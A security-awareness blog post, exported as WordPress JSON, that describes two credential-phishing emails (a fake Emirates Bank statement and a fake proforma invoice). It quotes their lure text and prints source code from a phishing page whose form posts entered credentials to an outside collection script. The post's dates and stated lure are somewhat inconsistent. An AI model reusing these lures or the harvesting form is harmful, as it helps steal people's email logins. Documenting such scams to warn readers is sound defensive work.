{"id":12784,"date":"2022-07-12T16:14:59","date_gmt":"2022-07-12T16:14:59","guid":{"rendered":"https:\/\/myonlinesecurity.co.uk\/?p=12784"},"modified":"2023-04-01T06:34:02","modified_gmt":"2023-04-01T06:34:02","slug":"email-credential-phishing-via-fake-emirates-bank-statement-and-fake-generic-proforma-invoice-scams","status":"publish","type":"page","link":"https:\/\/myonlinesecurity.co.uk\/email-credential-phishing-via-fake-emirates-bank-statement-and-fake-generic-proforma-invoice-scams\/","title":{"rendered":"Email Credential Phishing Via Fake Emirates Bank Statement And Fake Generic Proforma Invoice Scams"},"content":{"rendered":"
We see lots of phishing attempts for email credentials. This morning we are seeing a series of \u201cattacks\u201d using Adobe as the lure. So far I have seen 2 different ones<\/p>\n
Remember many email clients, especially on a mobile phone or tablet, only show the Name in the From: and not the bit in <domain.com >. That is why these scams and phishes work so well.<\/p>\n
The First email looks like:<\/p>\n
From:<\/strong> Emirates Bank Online Statement <no-reply-googleaccountupdate@emailmessagingservices.com.pl><\/p>\n Date:<\/strong> Wed 27\/09\/2021 00:30<\/p>\n Subject:<\/strong> Cash Statement<\/p>\n Attachment<\/strong>: Cash Statement.pdf<\/p>\n Dear Sir,<\/em><\/p>\n Please kindly find attached bank statement debit notification and a copy of bank transferred receipt made in your favour today against your invoice.<\/em><\/p>\n For your reference.<\/em><\/p>\n Thank you.<\/em><\/p>\n May M. Martinico<\/em><\/p>\n <\/p>\n This email has a genuine PDF attachment with a link to which will redirect you to . There is a warning on the bit.ly page that alerts to it being a phishing or malware site but will still allow you to visit the page by clicking the link.<\/p>\n The phishing page refuses to display in Internet Explorer, Firefox or Chrome. ( just displaying a plain white page) . It uses data:text\/html;base64<\/p>\n However downloading the html file will open in Firefox only on the computer.<\/p>\n The page looks like this<\/p>\n where if you enter any details and press submit, you are redirected to where you see this fake statement<\/p>\n <\/p>\n The next phishing scam works right out of the box with no effort<\/p>\n From:<\/strong> Chychou Ann <chychou@sce.pccu.edu.tw><\/p>\n Date:<\/strong> Wed 27\/09\/2017 02:36<\/p>\n Subject<\/strong>: Request For Proforma Invoice Urgent<\/p>\n Attachment<\/strong>: Ugent New Order.pdf<\/p>\n Hello!<\/em><\/p>\n Nice to contact you again after a long time.<\/em> Find attach our Ugent purchase order.Are the prices<\/em> and send me proforma invoice with Bank account and payment terms.<\/em><\/p>\n Best regard<\/em><\/p>\n Chychou Ann<\/em><\/p>\n <\/p>\n This PDF attachment looks like<\/p>\n Where if you follow the link you go to where you see<\/p>\n <\/p>\n Entering details tries to redirect you to , Where I get a 404 page not found ( a quick look up shows the site registered by Godaddy in 2001, The DNS is managed by Cloudflare and there is no site found, so it is highly likely that Cloudflare have null routed the DNS already)<\/p>\n A quick look at the source code of the 000webhost page shows that it appears to try to send the information via Googlemail , but I am not sure how successful that will be<\/p>\n <form method=\u201dPOST\u201d action=\u201dhttp:\/\/alliancecr.com\/skd\/xendr.php\u201d \/><\/em><\/p>\n <div style=\u201dposition: absolute; width: 313px; height: 20px; z-index: 1; left: 476px; top: 240px\u201d id=\u201dlayer3\u2033><\/em><\/p>\n <input type=\u201dhidden\u201d name=\u201dcontinue\u201d id=\u201dcontinue\u201d<\/em><\/p>\n value=\u201dhttp:\/\/mail.google.com\/mail\/\u201d \/><\/em><\/p>\n <input type=\u201dhidden\u201d name=\u201dservice\u201d id=\u201dservice\u201d<\/em><\/p>\n value=\u201dmail\u201d \/><\/em><\/p>\n <input type=\u201dhidden\u201d id=\u201d_utf8\u2033 name=\u201d_utf8\u2033 value=\u201d☃\u201d\/><\/em><\/p>\n <input type=\u201dhidden\u201d name=\u201dbgresponse\u201d id=\u201dbgresponse\u201d value=\u201djs_disabled\u201d><\/em><\/p>\n <input type=\u201dhidden\u201d name=\u201dchallengestate\u201d id=\u201dchallengestate\u201d value=\u201dAO4Zohb47sJS-tYrNsz1ONocIO2jeysxuca-R6LmDH0cX6Sjqn8BGWloBrG1WmwW-4r7QsnjCVJZNloVJdjdxBh2Zmw4RaTFp8vb9O9bAnlffm-82_cInUo\u201d><\/em><\/p>\n We all get very blas\u00e9 about phishing and think we know so much that we will never fall for a phishing attempt. Don\u2019t assume that all attempts are obvious. Watch for any site that invites you to enter ANY personal or financial information. It might be an email that says \u201cyou have won a prize\u201d or \u201csign up to this website for discounts, prizes and special offers\u201d<\/p>\nBody Content:<\/strong><\/h3>\n
Screenshot:<\/strong><\/h3>\n
Body Content:<\/strong><\/h3>\n
\nDo you still remember me am?<\/em><\/p>\n
\nstill the same like before? Pls confirm to us<\/em><\/p>\n